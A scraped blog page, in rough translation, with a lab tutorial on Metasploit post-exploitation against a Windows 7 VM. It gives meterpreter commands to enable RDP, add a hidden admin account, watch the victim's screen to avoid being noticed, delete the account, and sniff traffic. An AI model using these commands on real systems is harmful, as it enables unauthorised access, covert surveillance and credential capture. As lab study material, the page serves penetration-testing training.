当前位置:网站首页>Intranet information collection of Intranet penetration (2)
Intranet information collection of Intranet penetration (2)
2022-07-06 14:17:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
05 Open and connect 3389
see 3389 Port opening
Turn on 3389 Remote desktop
run post/windows/manage/enable_rdp
run getgui -e
You can use this command to add users on the target machine :
run getgui -u admin -p [email protected]( Some system passwords have to meet the complexity to create )
net localgroup administrators admin /add( take admin Users are added to the administrators group )
Remote connection to desktop
rdesktop -u username -p password ip
yes And then it's going to pop up GUI page ( If the user is not added to the administrator group, you cannot log in )
After logging in, you will be prompted to close win7( So we should observe whether the target plane is used in advance , In order to avoid being perceived by users to be attacked )
View remote desktop
screenshot( Intercept win7 Current screen , Check whether someone is using )
use espia
screengrab
screenshare( Get... In real time win7 The screen , Similar to the video style open in the browser )
Delete the specified account
run post/windows/manage/delete_user USERNAME=admin
06 Packet capture
Grab the bag
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
decode
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- msf生成payload大全
- 7-15 h0161. 求最大公约数和最小公倍数(PTA程序设计)
- How to understand the difference between technical thinking and business thinking in Bi?
- Experiment 6 inheritance and polymorphism
- 7-3 construction hash table (PTA program design)
- [dark horse morning post] Shanghai Municipal Bureau of supervision responded that Zhong Xue had a high fever and did not melt; Michael admitted that two batches of pure milk were unqualified; Wechat i
- 【MySQL数据库的学习】
- 2022华中杯数学建模思路
- Hackmyvm Target Series (3) - vues
- Applet Web Capture -fiddler
猜你喜欢
Record an edu, SQL injection practice
强化学习基础记录
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
HackMyvm靶机系列(3)-visions
Hcip -- MPLS experiment
HackMyvm靶机系列(7)-Tron
Package bedding of components
. How to upload XMIND files to Jinshan document sharing online editing?
Mixlab unbounded community white paper officially released
Attack and defense world misc practice area (simplerar, base64stego, no matter how high your Kung Fu is, you are afraid of kitchen knives)
随机推荐
Strengthen basic learning records
An unhandled exception occurred when C connected to SQL Server: system Argumentexception: "keyword not supported:" integrated
SRC mining ideas and methods
7-14 错误票据(PTA程序设计)
DVWA (5th week)
7-14 error ticket (PTA program design)
Callback function ----------- callback
Matlab opens M file garbled solution
HackMyvm靶机系列(4)-vulny
Hackmyvm target series (6) -videoclub
Experiment 7 use of common classes (correction post)
Intensive literature reading series (I): Courier routing and assignment for food delivery service using reinforcement learning
【数据库 三大范式】一看就懂
攻防世界MISC练习区(gif 掀桌子 ext3 )
Tencent map circle
记一次,修改密码逻辑漏洞实战
Detailed explanation of network foundation
Yugu p1012 spelling +p1019 word Solitaire (string)
Renforcer les dossiers de base de l'apprentissage
强化学习基础记录